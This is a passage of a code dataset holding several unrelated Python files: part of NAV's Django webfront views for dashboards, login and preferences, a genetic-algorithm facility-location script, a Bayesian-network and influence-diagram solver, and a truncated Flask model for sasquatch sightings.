account=request.account)\n\n response = JsonResponse(dashboard.to_json_dict())\n response['Content-Disposition'] = 'attachment; 
filename={name}.json'.format(\n name=urlquote(dashboard.name)\n )\n return response\n\n\ndashboard_fields = {\n 'name': str,\n 'num_columns': int,\n 'widgets': list,\n 'version': int,\n}\n\nwidget_fields = {\n 'navlet': str,\n 'column': int,\n 'preferences': dict,\n 'order': int,\n}\n\n\n@require_POST\ndef import_dashboard(request):\n \"\"\"Receive an uploaded dashboard file and store in database\"\"\"\n if not can_modify_navlet(request.account, request):\n return HttpResponseForbidden()\n response = {}\n if 'file' in request.FILES:\n try:\n # Ensure file is interpreted as utf-8 regardless of locale\n blob = request.FILES['file'].read()\n data = json.loads(blob.decode(\"utf-8\"))\n if not isinstance(data, dict):\n raise ValueError()\n for field, dtype in dashboard_fields.items():\n if field not in data:\n raise ValueError()\n if not isinstance(data[field], dtype):\n raise ValueError()\n dashboard = AccountDashboard(account=request.account, name=data['name'])\n dashboard.num_columns = data['num_columns']\n widgets = []\n for widget in data['widgets']:\n if not isinstance(widget, dict):\n raise ValueError()\n for field, dtype in widget_fields.items():\n if field not in widget:\n raise ValueError()\n if not isinstance(widget[field], dtype):\n raise ValueError()\n if widget['column'] > dashboard.num_columns:\n raise ValueError()\n widget = {k: v for k, v in widget.items() if k in widget_fields}\n widgets.append(widget)\n dashboard.save()\n for widget in widgets:\n dashboard.widgets.create(account=request.account, **widget)\n dashboard.save()\n response['location'] = reverse('dashboard-index-id', args=(dashboard.id,))\n except ValueError:\n _logger.exception('Failed to parse dashboard file for import')\n return JsonResponse(\n {\n 'error': \"File is not a valid dashboard file\",\n },\n status=400,\n )\n else:\n return JsonResponse(\n {\n 'error': \"You need to provide a file\",\n },\n status=400,\n )\n return JsonResponse(response)\n\n\n@sensitive_post_parameters('password')\ndef login(request):\n \"\"\"Controller for the login page\"\"\"\n if request.method == 'POST':\n return do_login(request)\n\n origin = request.GET.get('origin', '').strip()\n if 'noaccess' in request.GET:\n if request.account.is_default_account():\n errors = ['You need to log in to access this resource']\n else:\n errors = [\n 'You have insufficient privileges to access this '\n 'resource. 
Please log in as another user.'\n ]\n else:\n errors = []\n\n return render(\n request,\n 'webfront/login.html',\n {\n 'form': LoginForm(initial={'origin': origin}),\n 'origin': origin,\n 'errors': errors,\n },\n )\n\n\n@sensitive_variables('password')\ndef do_login(request):\n \"\"\"Do a login based on post parameters\"\"\"\n errors = []\n form = LoginForm(request.POST)\n origin = request.POST.get('origin', '').strip()\n\n if form.is_valid():\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n\n try:\n account = auth.authenticate(username, password)\n except ldapauth.Error as error:\n errors.append('Error while talking to LDAP:\\n%s' % error)\n else:\n if account:\n LogEntry.add_log_entry(\n account, 'log-in', '{actor} logged in', before=account\n )\n\n try:\n request.session[ACCOUNT_ID_VAR] = account.id\n request.account = account\n except ldapauth.Error as error:\n errors.append('Error while talking to LDAP:\\n%s' % error)\n else:\n _logger.info(\"%s successfully logged in\", account.login)\n if not origin:\n origin = reverse('webfront-index')\n return HttpResponseRedirect(origin)\n else:\n _logger.info(\"failed login: %r\", username)\n errors.append(\n 'Username or password is incorrect, or the ' 'account is locked.'\n )\n\n # Something went wrong. Display login page with errors.\n return render(\n request,\n 'webfront/login.html',\n {\n 'form': form,\n 'errors': errors,\n 'origin': origin,\n },\n )\n\n\ndef logout(request):\n \"\"\"Controller for doing a logout\"\"\"\n nexthop = auth_logout(request)\n return HttpResponseRedirect(nexthop)\n\n\ndef about(request):\n \"\"\"Controller for the about page\"\"\"\n return render(\n request,\n 'webfront/about.html',\n {\n 'navpath': [('Home', '/'), ('About', None)],\n 'title': 'About NAV',\n },\n )\n\n\ndef toolbox(request):\n \"\"\"Render the toolbox\"\"\"\n account = request.account\n tools = sorted(tool_list(account), key=attrgetter('name'))\n\n return render(\n request,\n 'webfront/toolbox.html',\n {\n 'navpath': [('Home', '/'), ('Toolbox', None)],\n 'tools': tools,\n 'title': 'NAV toolbox',\n },\n )\n\n\ndef _create_preference_context(request):\n \"\"\"\n Creates a context used by different views for the multiform preference page\n \"\"\"\n account = get_account(request)\n\n if account.ext_sync:\n password_form = None\n else:\n password_form = ChangePasswordForm()\n\n context = {\n 'navpath': [('Home', '/'), ('Preferences', None)],\n 'title': 'Personal NAV preferences',\n 'password_form': password_form,\n 'columns_form': ColumnsForm(\n initial={'num_columns': get_widget_columns(account)}\n ),\n 'account': account,\n 'tool': {\n 'name': 'My account',\n 'description': 'Edit my personal NAV account settings',\n },\n 'navbar_formset': NavbarLinkFormSet(\n queryset=NavbarLink.objects.filter(account=account)\n ),\n }\n\n return context\n\n\ndef preferences(request):\n \"\"\"My preferences\"\"\"\n context = _create_preference_context(request)\n\n return render(request, 'webfront/preferences.html', context)\n\n\n@sensitive_post_parameters('old_password', 'new_password1', 'new_password2')\ndef change_password(request):\n \"\"\"Handles POST requests to change a users password\"\"\"\n context = _create_preference_context(request)\n account = get_account(request)\n\n if account.is_default_account():\n return render(request, 'useradmin/not-logged-in.html', {})\n\n if request.method == 'POST':\n password_form = ChangePasswordForm(request.POST, my_account=account)\n\n if password_form.is_valid():\n 
account.set_password(password_form.cleaned_data['new_password1'])\n account.save()\n new_message(\n request, 'Your password has been changed.', type=Messages.SUCCESS\n )\n else:\n context['password_form'] = password_form\n return render(request, 'webfront/preferences.html', context)\n\n return HttpResponseRedirect(reverse('webfront-preferences'))\n\n\ndef save_links(request):\n \"\"\"Saves navigation preference links on a user\"\"\"\n account = get_account(request)\n context = _create_preference_context(request)\n\n if request.method == 'POST':\n formset = NavbarLinkFormSet(request.POST)\n if formset.is_valid():\n instances = formset.save(commit=False)\n for instance in instances:\n instance.account = account\n instance.save()\n for form in formset.deleted_objects:\n instance = form.delete()\n new_message(request, 'Your links were updated.', type=Messages.SUCCESS)\n else:\n context['navbar_formset'] = formset\n\n return render(request, 'webfront/preferences.html', context)\n\n return HttpResponseRedirect(reverse('webfront-preferences'))\n\n\ndef set_widget_columns(request):\n \"\"\"Set the number of columns on the webfront\"\"\"\n if request.method == 'POST':\n form = ColumnsForm(request.POST)\n if form.is_valid():\n account = request.account\n num_columns = form.cleaned_data.get('num_columns')\n account.preferences[account.PREFERENCE_KEY_WIDGET_COLUMNS] = num_columns\n account.save()\n return HttpResponseRedirect(reverse('webfront-index'))\n return HttpResponseRedirect(reverse('webfront-preferences'))\n\n\ndef set_account_preference(request):\n \"\"\"Set account preference using url attributes\"\"\"\n account = request.account\n account.preferences.update(request.GET.dict())\n account.save()\n return HttpResponse()\n\n\n@require_POST\ndef set_default_dashboard(request, did):\n \"\"\"Set the default dashboard for the user\"\"\"\n dash = get_object_or_404(AccountDashboard, pk=did, account=request.account)\n try:\n old_default = AccountDashboard.objects.get(\n account=request.account, is_default=True\n )\n except AccountDashboard.DoesNotExist:\n # No previous default\n old_default = None\n\n dash.is_default = True\n dash.save()\n if old_default:\n old_default.is_default = False\n old_default.save()\n return HttpResponse(u'Default dashboard set to «{}»'.format(dash.name))\n\n\n@require_POST\ndef add_dashboard(request):\n \"\"\"Add a new dashboard to this user\"\"\"\n name = request.POST.get('dashboard-name', 'New dashboard')\n dashboard = AccountDashboard(account=request.account, name=name)\n dashboard.save()\n return JsonResponse({'dashboard_id': dashboard.pk})\n\n\n@require_POST\ndef delete_dashboard(request, did):\n \"\"\"Delete this dashboard and all widgets on it\"\"\"\n is_last = AccountDashboard.objects.filter(account=request.account).count() == 1\n if is_last:\n return HttpResponse('Can not delete last dashboard', status=400)\n\n dash = get_object_or_404(AccountDashboard, pk=did, account=request.account)\n dash.delete()\n\n return HttpResponse('Dashboard deleted')\n\n\n@require_POST\ndef rename_dashboard(request, did):\n \"\"\"Rename this dashboard\"\"\"\n dash = get_object_or_404(AccountDashboard, pk=did, account=request.account)\n dash.name = request.POST.get('dashboard-name', dash.name)\n dash.save()\n return HttpResponse(u'Dashboard renamed to «{}»'.format(dash.name))\n\n\n@require_POST\ndef save_dashboard_columns(request, did):\n \"\"\"Save the number of columns for this dashboard\"\"\"\n\n # Explicit fetch on account to prevent other people to change settings\n dashboard = 
get_object_or_404(AccountDashboard, pk=did, account=request.account)\n dashboard.num_columns = request.POST.get('num_columns', 3)\n dashboard.save()\n return HttpResponse()\n\n\n@require_POST\n@require_param('widget_id')\ndef moveto_dashboard(request, did):\n \"\"\"Move a widget to this dashboard\"\"\"\n account = request.account\n dashboard = get_object_or_404(AccountDashboard, account=account, pk=did)\n widget = get_object_or_404(\n AccountNavlet, account=account, pk=request.POST.get('widget_id')\n )\n widget.dashboard = dashboard\n widget.save()\n return HttpResponse(u'Widget moved to {}'.format(dashboard))\n","repo_name":"Uninett/nav","sub_path":"python/nav/web/webfront/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14595,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"95"} +{"seq_id":"73626070393","text":"import random\r\n\r\nclass Facility:\r\n def __init__(self, id, capacity, fixed_cost, operating_cost):\r\n self.id = id\r\n self.capacity = capacity\r\n self.fixed_cost = fixed_cost\r\n self.operating_cost = operating_cost\r\n self.customers = []\r\n\r\n def add_customer(self, customer):\r\n self.customers.append(customer)\r\n\r\n def remove_customer(self, customer):\r\n self.customers.remove(customer)\r\n\r\nclass Customer:\r\n def __init__(self, id, demand):\r\n self.id = id\r\n self.demand = demand\r\n\r\nclass GeneticAlgorithm:\r\n def __init__(self, population_size, num_generations, crossover_rate, mutation_rate):\r\n self.population_size = population_size\r\n self.num_generations = num_generations\r\n self.crossover_rate = crossover_rate\r\n self.mutation_rate = mutation_rate\r\n self.population = []\r\n\r\n def initialize_population(self, facilities, customers):\r\n for _ in range(self.population_size):\r\n chromosome = []\r\n for customer in customers:\r\n facility = random.choice(facilities)\r\n chromosome.append((customer.id, facility.id))\r\n self.population.append(chromosome)\r\n\r\n def evaluate_fitness(self, chromosome):\r\n total_cost = 0\r\n for customer_id, facility_id in chromosome:\r\n facility = facilities[facility_id]\r\n customer = customers[customer_id]\r\n total_cost += facility.fixed_cost + facility.operating_cost * customer.demand\r\n return -total_cost # Minimize cost, so negate the value\r\n\r\n def select_parents(self):\r\n # Tournament selection\r\n tournament_size = 2\r\n parents = []\r\n for _ in range(2):\r\n tournament = random.sample(self.population, tournament_size)\r\n parent = max(tournament, key=lambda x: self.evaluate_fitness(x))\r\n parents.append(parent)\r\n return parents\r\n\r\n def crossover(self, parent1, parent2):\r\n if random.random() < self.crossover_rate:\r\n crossover_point = random.randint(1, len(parent1) - 1)\r\n child1 = parent1[:crossover_point] + parent2[crossover_point:]\r\n child2 = parent2[:crossover_point] + parent1[crossover_point:]\r\n return child1, child2\r\n else:\r\n return parent1, parent2\r\n\r\n def mutate(self, chromosome):\r\n mutated_chromosome = []\r\n for gene in chromosome:\r\n if random.random() < self.mutation_rate:\r\n customer_id, _ = gene\r\n facility_id = random.randint(0, len(facilities) - 1)\r\n mutated_gene = (customer_id, facility_id)\r\n mutated_chromosome.append(mutated_gene)\r\n else:\r\n mutated_chromosome.append(gene)\r\n return mutated_chromosome\r\n\r\n def evolve(self):\r\n for _ in range(self.num_generations):\r\n new_population = []\r\n\r\n while len(new_population) < self.population_size:\r\n parent1, parent2 = 
self.select_parents()\r\n child1, child2 = self.crossover(parent1, parent2)\r\n mutated_child1 = self.mutate(child1)\r\n mutated_child2 = self.mutate(child2)\r\n new_population.extend([mutated_child1, mutated_child2])\r\n\r\n self.population = new_population\r\n\r\n best_chromosome = max(self.population, key=lambda x: self.evaluate_fitness(x))\r\n best_fitness = self.evaluate_fitness(best_chromosome)\r\n return best_chromosome, -best_fitness # Return the positive fitness value\r\n\r\n# Example usage\r\nfacilities = [\r\n Facility(id=0, capacity=100, fixed_cost=10, operating_cost=1),\r\n Facility(id=1, capacity=200, fixed_cost=20, operating_cost=2),\r\n Facility(id=2, capacity=150, fixed_cost=15, operating_cost=1.5)\r\n]\r\n\r\ncustomers = [\r\n Customer(id=0, demand=50),\r\n Customer(id=1, demand=80),\r\n Customer(id=2, demand=120)\r\n]\r\n\r\nga = GeneticAlgorithm(population_size=10, num_generations=100, crossover_rate=0.8, mutation_rate=0.2)\r\nga.initialize_population(facilities, customers)\r\nbest_chromosome, best_fitness = ga.evolve()\r\n\r\nprint(\"Best Solution:\", best_chromosome)\r\nprint(\"Best Cost:\", best_fitness)\r\n","repo_name":"amirata051/Linear-programming","sub_path":"Q2_Genetic.py","file_name":"Q2_Genetic.py","file_ext":"py","file_size_in_byte":4240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"6480710148","text":"import re\nimport sys\nfrom copy import deepcopy\nfrom decimal import Decimal\nfrom itertools import product\n\nimport itertools\n\n# ______________________________________________________________________________\n\nlistOfQueries = []\nT, F = True, False\nkeyPrintValue =[]\n\n\n# ______________________________________________________________________________\n\nclass ProbDist:\n def __init__(self, varname='?', freqs=None):\n\n self.prob = {}\n self.varname = varname\n self.values = []\n\n if freqs:\n for (v, p) in list(freqs.items()):\n self[v] = p\n self.normalize()\n\n def __getitem__(self, val):\n\n try:\n return self.prob[val]\n except KeyError:\n return 0\n\n def __setitem__(self, val, p):\n\n if val not in self.values:\n self.values.append(val)\n self.prob[val] = p\n\n def normalize(self):\n\n total = sum(self.prob.values())\n if not isclose(total, 1.0):\n for val in self.prob:\n self.prob[val] /= total\n\n return self\n\n def show_approx(self, numfmt='%.3g'):\n\n return ', '.join([('%s: ' + numfmt) % (v, p)\n for (v, p) in sorted(self.prob.items())])\n\n# ______________________________________________________________________________\n\ndef event_values(event, variables):\n\n #print variables\n if isinstance(event, tuple) and len(event) == len(variables):\n #print event\n return event\n else:\n #print tuple([event[var] for var in variables])\n return tuple([event[var] for var in variables])\n\ndef isclose(a, b, rel_tol=1e-09, abs_tol=0.0):\n\n return abs(a - b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)\n\n# ______________________________________________________________________________\n\nclass BayesNet:\n\n\n\n def __init__(self, node_specs=[]):\n\n self.nodes = []\n self.variables = []\n for node_spec in node_specs:\n self.add(node_spec)\n\n def add(self, node_spec):\n\n node = BayesNode(*node_spec)\n assert node.variable not in self.variables\n assert every(lambda parent: parent in self.variables, node.parents)\n self.nodes.append(node)\n self.variables.append(node.variable)\n for parent in node.parents:\n self.variable_node(parent).children.append(node)\n\n def variable_node(self, 
var):\n\n for n in self.nodes:\n if n.variable == var:\n return n\n raise Exception(\"No such variable: %s\" % var)\n\n def variable_values(self, var):\n\n return [True,False]\n\n def __repr__(self):\n return 'BayesNet(%r)' % self.nodes\n def getValues(self):\n return self\n\n# ______________________________________________________________________________\n\ndef every(predicate, seq): # TODO: replace with all\n \"\"\"True if every element of seq satisfies predicate.\"\"\"\n\n return all(predicate(x) for x in seq)\n\ndef doRound(a):\n val = Decimal(str(a)).quantize(Decimal('.01'))\n return val\n\nclass BayesNode:\n\n\n\n def __init__(self, X, parents, cpt):\n\n if isinstance(parents, str):\n parents = parents.split()\n\n # We store the table always in the third form above.\n if isinstance(cpt, (float, int)): # no parents, 0-tuple\n cpt = {(): cpt}\n elif isinstance(cpt, dict):\n # one parent, 1-tuple\n if cpt and isinstance(list(cpt.keys())[0], bool):\n cpt = dict(((v,), p) for v, p in list(cpt.items()))\n\n assert isinstance(cpt, dict)\n for vs, p in list(cpt.items()):\n assert isinstance(vs, tuple) and len(vs) == len(parents)\n assert every(lambda v: isinstance(v, bool), vs)\n #assert 0 <= p <= 1\n\n self.variable = X\n self.parents = parents\n self.cpt = cpt\n self.children = []\n\n def p(self, value, event):\n\n assert isinstance(value, bool)\n t= event_values(event, self.parents)\n ptrue = self.cpt[event_values(event, self.parents)]\n if(ptrue !=1):\n return (ptrue if value else 1 - ptrue)\n else:\n return (ptrue if value else ptrue)\n\n\n def __repr__(self):\n\n return repr((self.variable, ' '.join(self.parents)))\n\n# ______________________________________________________________________________\n\ndef calculateJointProbablity(X, e, bn):\n\n assert X not in e, \"Query variable must be distinct from evidence\"\n Q = ProbDist(X)\n for xi in bn.variable_values(X):\n Q[xi] = enumerate_all(bn.variables, extend(e, X, xi), bn)\n\n return Q.prob\n\ndef enumeration_ask(X, e, bn):\n\n assert X not in e, \"Query variable must be distinct from evidence\"\n listOfVarC = X.split(', ')\n lenOfVar = len(listOfVarC)\n Q = ProbDist(X)\n for xi in itertools.product(bn.variable_values(X), repeat = lenOfVar):\n Q[xi] = enumerate_all(bn.variables, extend(e, X, xi), bn)\n return Q.normalize()\n\ndef extend(s, var, val):\n\n s2 = s.copy()\n t1 = var.split(', ')\n if(isinstance(val, tuple)):\n for k in range(0, len(val)):\n s2[t1[k]] = val[k]\n else:\n s2[var] = val\n return s2\n\n\ndef enumerate_all(variables, e, bn):\n\n if not variables:\n return 1.0\n Y, rest = variables[0], variables[1:]\n Ynode = bn.variable_node(Y)\n if Y in e:\n return Ynode.p(e[Y], e) * enumerate_all(rest, e, bn)\n else:\n return sum(Ynode.p(y, e) * enumerate_all(rest, extend(e, Y, y), bn)\n for y in bn.variable_values(Y))\n# ______________________________________________________________________________\ndef parserInputFile():\n listOfNode = []\n listOfParents =[]\n bayesNetObject =[]\n\n storeLine =()\n mainNode ={}\n with open(sys.argv[2], \"r\") as infile:\n #To Get all the Queries in the List\n for line in infile:\n parseLine = line.strip()\n if(parseLine == \"******\"):\n break\n else:\n listOfQueries.append(parseLine)\n #print listOfQueries\n storeTheRelationship =[]\n parentNodes =[]\n for line in infile:\n parseLine = line.strip()\n #print parseLine\n if(parseLine == \"***\" or parseLine == \"******\"):\n if(len(mainNode) != 0):\n storeLine = storeLine + (mainNode,)\n bayesNetObject.append(storeLine)\n #empty all the 
object\n currentNode=[]\n parentNode=[]\n storeLine=()\n mainNode={}\n\n else:\n\n startString = parseLine.split(' ')[0]\n t = re.match(\"^[A-Za-z]\", startString)\n if(t != None):\n\n if(t.string == \"decision\"):\n storeLine = storeLine + (1,)\n elif(re.match(\"^[A-Za-z]\",startString ) ):\n\n storeTheRelationship =parseLine.split('|')\n currentNode = storeTheRelationship[0].strip()\n storeLine = storeLine + (currentNode,)\n parentNodes = storeTheRelationship[1:len(storeTheRelationship)]\n if (len(parentNodes) == 0):\n storeLine = storeLine +('',)\n else:\n allParentNode = ' '.join(parentNodes).strip()\n storeLine = storeLine + (allParentNode,)\n else:\n #print \"Its a number\"\n numberNode = parseLine.split(' ')\n probvalue = float(numberNode[0])\n truthTable = numberNode[1: len(numberNode)]\n\n if (len(truthTable) == 0):\n storeLine = storeLine + (probvalue,)\n\n elif (len(truthTable) == 1):\n\n if (truthTable[0] == '+'):\n mainNode[T] = probvalue\n else:\n mainNode[F] = probvalue\n #storeLine = storeLine + (mainNode,)\n\n elif (len(truthTable) == 2):\n tempTuple =()\n if(truthTable[0] == \"+\" and truthTable[1] == \"+\"):\n tempTuple = (T, T)\n elif (truthTable[0] == \"+\" and truthTable[1] == \"-\"):\n tempTuple = (T, F)\n elif (truthTable[0] == \"-\" and truthTable[1] == \"+\"):\n tempTuple = (F, T)\n else:\n tempTuple = (F, F)\n mainNode[tempTuple] = probvalue\n\n else :\n tempTuple = ()\n if (truthTable[0] == \"+\" and truthTable[1] == \"+\" and truthTable[2] == \"+\"):\n tempTuple = (T, T, T)\n elif (truthTable[0] == \"+\" and truthTable[1] == \"+\" and truthTable[2] == \"-\"):\n tempTuple = (T, T, F)\n elif (truthTable[0] == \"+\" and truthTable[1] == \"-\" and truthTable[2] == \"+\"):\n tempTuple = (T, F, T)\n elif (truthTable[0] == \"+\" and truthTable[1] == \"-\" and truthTable[2] == \"-\"):\n tempTuple = (T, F, F)\n elif (truthTable[0] == \"-\" and truthTable[1] == \"+\" and truthTable[2] == \"+\"):\n tempTuple = (F, T, T)\n elif (truthTable[0] == \"-\" and truthTable[1] == \"+\" and truthTable[2] == \"-\"):\n tempTuple = (F, T, F)\n elif (truthTable[0] == \"-\" and truthTable[1] == \"-\" and truthTable[2] == \"+\"):\n tempTuple = (F, F, T)\n elif (truthTable[0] == \"-\" and truthTable[1] == \"-\" and truthTable[2] == \"-\"):\n tempTuple = (F, F, F)\n\n mainNode[tempTuple] = probvalue\n\n #storeLine = storeLine + (mainNode,)\n storeLine = storeLine + (mainNode,)\n bayesNetObject.append(storeLine)\n #print \"***********\"\n #print bayesNetObject\n return bayesNetObject\n\ndef calculateProbablity(i,Prg):\n\n if ('|' in i):\n varDict = {}\n qItem =[]\n nameOfVariable =[]\n queryVar = i[i.index(\"(\") + 1:i.index(\" | \")].split(', ')\n evidenceVar = i[i.index(\"|\") + 1:i.index(\")\")].split(', ')\n argsList =[]\n varDict = getEvidenceDictionary(evidenceVar)\n for k in queryVar:\n if('=' in k):\n qItem = k.split(' = ')\n if (qItem[1].strip() == \"+\"):\n keyPrintValue.append(T)\n nameOfVariable.append(qItem[0])\n else:\n keyPrintValue.append(F)\n nameOfVariable.append(qItem[0])\n else:\n keyPrintValue.append(T)\n nameOfVariable.append(k)\n #qItem.append(k)\n argString = ', '.join(nameOfVariable)\n\n\n value = enumeration_ask(argString, varDict, Prg)\n return value.prob\n\n else:\n\n listVariable = i[i.index(\"(\") + 1:i.index(\")\")].split(',')\n varDict = getEvidenceDictionary(listVariable)\n value = calculateJointProbablity('', varDict, Prg)\n keyPrintValue.append(T)\n return value\n\n\n\ndef calculateParents(utility, Prg):\n parentList = Prg.variable_node(utility)\n return 
parentList.parents\n\ndef calculateUtility(utility, Prg):\n parentList = Prg.variable_node(utility)\n return parentList.cpt\n\n\ndef getEvidenceDictionary(listVariable):\n varDict = {}\n for j in listVariable:\n gItem = j.split(' = ')\n if (gItem[1].strip() == \"+\"):\n varDict[gItem[0].strip()] = T\n else:\n varDict[gItem[0].strip()] = F\n\n return varDict\n\n\ndef calculateExpectedUtility(Prg,i):\n deleteDict ={}\n vTemp = calculateUtility(\"utility\", Prg)\n\n listOfParents = calculateParents(\"utility\", Prg)\n listOfEve = i[i.index(\"(\") + 1:i.index(\")\")]\n if ('|' in listOfEve):\n temp = listOfEve.split('|')\n listOfEve = ', '.join(temp)\n kTemp = listOfEve.split(', ')\n temp = getEvidenceDictionary(kTemp)\n kItems = temp.keys()\n listCopy = deepcopy(listOfParents)\n\n for x in listCopy:\n if (x in temp ):\n deleteDict[x] = listCopy.index(x)\n listCopy.remove(x)\n\n\n\n #print deleteDict\n\n if (len(listOfParents) == 1):\n X = ', '.join(listOfParents)\n probsValue = enumeration_ask(X, temp, Prg)\n probsDict = probsValue.prob\n value =0\n for key1, value1 in probsDict.iteritems():\n for key2, value2 in vTemp.iteritems():\n if (key1 == key2):\n value = value + (value1 * value2)\n\n\n\n elif (len(listOfParents) == 2):\n\n if(len(listCopy) == 2):\n X = ', '.join(listCopy)\n probsValue = enumeration_ask(X, temp, Prg)\n probsDict = probsValue.prob\n value = 0\n for key1, value1 in probsDict.iteritems():\n for key2, value2 in vTemp.iteritems():\n if (key1 == key2):\n value = value + (value1 * value2)\n else:\n X = ', '.join(listCopy)\n probsValue = enumeration_ask(X, temp, Prg)\n probsDict = probsValue.prob\n #print probsDict\n kList =[None, None]\n for key, value in deleteDict.items():\n kList[value] = temp.get(key)\n #print kList\n for k in range(0,1):\n if(kList[k] == None):\n kList[k] = T\n v1 = tuple(kList,)\n kList[k] = F\n v2 = tuple(kList,)\n value = probsDict[(T,)]*vTemp[v1] + probsDict[(F,)]*vTemp[v2]\n\n\n elif (len(listCopy) == 3):\n\n if (len(listCopy) == 3):\n X = ', '.join(listCopy)\n probsValue = enumeration_ask(X, temp, Prg)\n probsDict = probsValue.prob\n value = 0\n for key1, value1 in probsDict.iteritems():\n for key2, value2 in vTemp.iteritems():\n if (key1 == key2):\n value = value + (value1 * value2)\n\n elif(len(listCopy) == 2):\n\n X = ', '.join(listCopy)\n probsValue = enumeration_ask(X, temp, Prg)\n probsDict = probsValue.prob\n # print probsDict\n kList = [None, None, None]\n for key, value in deleteDict.items():\n kList[value] = temp.get(key)\n posList =[]\n for t in kList:\n if(t == None):\n posList.append(kList.index(t))\n for xi in itertools.product([T,F], repeat = 2):\n kList[posList[0]] = xi[0]\n kList[posList[1]] = xi[1]\n t = tuple(kList)\n value = value + probsDict[xi] * vTemp[t]\n\n else:\n X = ', '.join(listCopy)\n probsValue = enumeration_ask(X, temp, Prg)\n probsDict = probsValue.prob\n # print probsDict\n kList = [None, None, None]\n for key, value in deleteDict.items():\n kList[value] = temp.get(key)\n # print kList\n for k in range(0, 2):\n if (kList[k] == None):\n kList[k] = T\n v1 = tuple(kList, )\n kList[k] = F\n v2 = tuple(kList, )\n value = probsDict[(T,)] * vTemp[v1] + probsDict[(F,)] * vTemp[v2]\n\n\n\n return value\n\n\n\n\n\ndef maximumExpectedUtility(Prg, ii):\n #print \"Inside MaximumUtilty\"\n tempQuery = ii[ii.index(\"(\") + 1:ii.index(\")\")]\n tempString = tempQuery.replace(', ', ' | ')\n tempList = tempString.split(' | ')\n # print tempList\n varValue = {}\n for i in range(0, len(tempList)):\n tempValue = tempList[i].split(\" = 
\")\n if len(tempValue) == 2:\n tempList[i] = tempValue[0]\n varValue[i] = tempValue[1]\n # print varValue\n # print tempList\n length = len(tempList)\n varList = ['+', '-']\n max = 0\n value = 0\n tup = ()\n flag = 0\n #query = Query()\n for xi in itertools.product(varList, repeat=length):\n argumentList = []\n for i in range(0, length):\n if varValue.has_key(i):\n if xi[i] == varValue.get(i):\n flag = 0\n else:\n flag = 1\n argumentList.append(tempList[i] + \" = \" + xi[i])\n tempString = \", \".join(argumentList)\n tempString = \"EU(\" + tempString +\")\"\n #query.value = tempString\n if flag == 1:\n flag = 0\n else:\n value = calculateExpectedUtility(Prg, tempString)\n if value > max:\n max = value\n tup = xi\n tempString = \"\"\n for i in range(0, len(tup)):\n if varValue.has_key(i):\n flag = 1\n else:\n tempString += tup[i] + \" \"\n tempString += str(int(max + 0.5))\n return tempString\n\n\ndef writeFile(a,f1):\n str5 = str(a) + \"\\n\"\n f1.write(str5)\n\n\ndef parseQuery(listOfQueries):\n bayesianNetwork = parserInputFile()\n f1 = open(\"output.txt\", 'w')\n\n #print bayesianNetwork\n Prg = BayesNet(bayesianNetwork)\n for i in listOfQueries:\n firstChar = i[:1]\n if(firstChar== \"P\"):\n valueReturn = calculateProbablity(i,Prg)\n x = keyPrintValue[0]\n checkType = valueReturn.keys()\n\n if (isinstance(checkType[0], tuple)):\n if(len(checkType[0]) == 1):\n writeFile(doRound(valueReturn.get((x,))),f1)\n elif(len(checkType[0]) == 2):\n tup = ()\n #print nameOfVariable\n #print keyPrintValue\n for i in keyPrintValue:\n if(i == T):\n tup += (T,)\n else:\n tup+= (F,)\n writeFile(doRound(valueReturn.get(tup)),f1)\n else:\n tup = ()\n #When there are three variable in left of conditional probablity\n for i in keyPrintValue:\n if (i == T):\n tup += (T,)\n else:\n tup += (F,)\n writeFile(doRound(valueReturn.get(tup)),f1)\n\n #Is instance of String: When there is no Conditional Probablity\n else:\n writeFile(doRound(valueReturn[x]),f1)\n\n del keyPrintValue[:]\n\n elif(firstChar == \"E\"):\n finalEUValue = calculateExpectedUtility(Prg,i)\n writeFile(int(finalEUValue+0.5),f1)\n\n elif(firstChar == \"M\"):\n finalMEUValue = maximumExpectedUtility(Prg,i)\n writeFile(finalMEUValue,f1)\n #return 0\n\n#Main Program Starts Here\n\nparseQuery(listOfQueries)\n\n","repo_name":"vivektiwari7114/InfluenceDiagram","sub_path":"BayesianNetworks.py","file_name":"BayesianNetworks.py","file_ext":"py","file_size_in_byte":19230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"189908558","text":"from flask_app.config.mysqlconnection import connectToMySQL\nfrom flask import flash\nfrom flask_app.models.user import User\n\nclass Sasq:\n db_name = 'sasquatch'\n\n def __init__(self,db_data):\n print(db_data)\n self.id = db_data['id']\n self.location = db_data['location']\n self.description = db_data['description']\n self.num_of_sasq = db_data['num_of_sasq']\n self.date_siting = db_data['date_siting']\n self.user_id = db_data['user_id']\n user = User.get_by_id({'id': db_data['user_id']})\n self.name = user.first_name +\" \"+ user.last_name\n self.created_at = db_data['created_at']\n self.updated_at = db_data['updated_at']\n\n @classmethod\n def save(cls,data):\n query = \"INSERT INTO sasq (location, description, num_of_sasq, date_siting, user_id) VALUES (%(location)s,%(description)s,%(num_of_sasq)s,%(date_siting)s,%(user_id)s);\"\n return connectToMySQL(cls.db_name).query_db(query, data)\n\n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM 
sasq;\"\n results = connectToMySQL(cls.db_name).query_db(query)\n all_sasq = []\n for row in results:\n print(row['date_siting'])\n all_sasq.append( cls(row) )\n return all_sasq\n \n @classmethod\n def get_one(cls,data):\n query = \"SELECT * FROM sasq WHERE id = %(id)s;\"\n results = connectToMySQL(cls.db_name).query_db(query,data)\n return cls( results[0] )\n\n @classmethod\n def update(cls, data):\n query = \"UPDATE sasq SET location=%(location)s, description=%(description)s, num_of_sasq=%(num_of_sasq)s, date_siting=%(date_siting)s,updated_at=NOW() WHERE id = %(id)s;\"\n return connectToMySQL(cls.db_name).query_db(query,data)\n \n @classmethod\n def destroy(cls,data):\n query = \"DELETE FROM sasq WHERE id = %(id)s;\"\n return connectToMySQL(cls.db_name).query_db(query,data)\n\n @staticmethod\n def validate_sasq(sasq):\n is_valid = True\n if len(sasq['location']) < 3:\n is_valid = False\n flash(\"Location must be filled in\",\"sasq\")\n if int(sasq['num_of_sasq']) < 1:\n is_valid = False\n flash(\"Number of Sasquatches must be at least 1\",\"sasq\")\n if len(sasq['description']) < 5:\n is_valid = False\n flash(\"Description must be filled in\",\"sasq\")\n if sasq['date_siting'] == \"\":\n is_valid = False\n 